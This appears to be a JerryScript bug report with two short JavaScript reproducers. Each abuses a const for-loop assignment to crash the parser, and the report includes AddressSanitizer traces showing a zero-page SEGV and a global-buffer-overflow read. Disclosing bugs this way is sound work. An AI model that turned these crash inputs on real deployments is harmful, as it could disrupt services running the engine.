//poc1.js
// Reproducer (poc1): the for-loop condition `(x) = dec()` assigns to the
// `const` loop binding through a parenthesized target. According to the ASan
// trace that follows, the fault is reached from jerry_parse ->
// parser_parse_source -> parser_free_jumps -> parser_stack_iterator_read_uint8,
// i.e. while the source is still being parsed, before any statement here runs;
// the faulting access is a read near address 0 (0x15, "zero page").
// Reported against commit de515316cf603052fe873c0d00c8b265cc8dfee2 (see the
// "Commit ID" field at the end of the report).
function dec() {};
for (const x = 0; (x) = dec (); ) {}
Output
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3377315==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000015 (pc 0x55b503ef31b4 bp 0x7fff0752c970 sp 0x7fff0752c830 T0)
==3377315==The signal is caused by a READ memory access.
==3377315==Hint: address points to the zero page.
#0 0x55b503ef31b4 in parser_stack_iterator_read_uint8 /jerryscript/jerry-core/parser/js/js-parser-mem.c:649
#1 0x55b503efba9a in parser_free_jumps /jerryscript/jerry-core/parser/js/js-parser-statm.c:3318
#2 0x55b503e93f0b in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2371
#3 0x55b503e394d4 in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418
#4 0x55b503e396ec in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486
#5 0x55b503f01647 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52
#6 0x55b503f016e3 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63
#7 0x55b503e33d91 in main /jerryscript/jerry-main/main-desktop.c:156
#8 0x7efcbaf8dd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#9 0x7efcbaf8de3f in __libc_start_main_impl ../csu/libc-start.c:392
#10 0x55b503e36224 in _start (/jerryscript/release/bin/jerry+0x29224)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /jerryscript/jerry-core/parser/js/js-parser-mem.c:649 in parser_stack_iterator_read_uint8
==3377315==ABORTING
Test case
//poc2.js
// Reproducer (poc2): identical to poc1 except that `dec` declares one
// parameter. With this variant the ASan report that follows is a 1-byte
// global-buffer-overflow read in parser_statement_length (again reached via
// parser_free_jumps during parsing), 4 bytes past the end of the 19-byte
// global `parser_statement_flags` table, rather than the zero-page SEGV seen
// with poc1. Both variants fault at parse time, so no script code executes.
function dec(x) {};
for (const x = 0; (x) = dec (); ) {}
Output
=====================================
==3377298==ERROR: AddressSanitizer: global-buffer-overflow on address 0x560999fb7c17 at pc 0x560999f8cd25 bp 0x7ffc55b6bf70 sp 0x7ffc55b6bf60
READ of size 1 at 0x560999fb7c17 thread T0
#0 0x560999f8cd24 in parser_statement_length /jerryscript/jerry-core/parser/js/js-parser-statm.c:291
#1 0x560999f8cd24 in parser_free_jumps /jerryscript/jerry-core/parser/js/js-parser-statm.c:3379
#2 0x560999f24f0b in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2371
#3 0x560999eca4d4 in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418
#4 0x560999eca6ec in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486
#5 0x560999f92647 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52
#6 0x560999f926e3 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63
#7 0x560999ec4d91 in main /jerryscript/jerry-main/main-desktop.c:156
#8 0x7f718b81dd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#9 0x7f718b81de3f in __libc_start_main_impl ../csu/libc-start.c:392
#10 0x560999ec7224 in _start (/jerryscript/release/bin/jerry+0x29224)
0x560999fb7c17 is located 4 bytes to the right of global variable 'parser_statement_flags' defined in '/jerryscript/jerry-core/parser/js/js-parser-statm.c:82:22' (0x560999fb7c00) of size 19
SUMMARY: AddressSanitizer: global-buffer-overflow /jerryscript/jerry-core/parser/js/js-parser-statm.c:291 in parser_statement_length
Shadow bytes around the buggy address:
0x0ac1b33eef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ac1b33eef40: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9
0x0ac1b33eef50: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ac1b33eef60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ac1b33eef70: 00 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9
=>0x0ac1b33eef80: 00 00[03]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ac1b33eef90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ac1b33eefa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ac1b33eefb0: 00 00 00 00 00 00 00 00 00 00 00 00 06 f9 f9 f9
0x0ac1b33eefc0: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
0x0ac1b33eefd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3377298==ABORTING
Commit ID
de515316cf603052fe873c0d00c8b265cc8dfee2
Build platform
Ubuntu 22.04.3
Build steps
Execution steps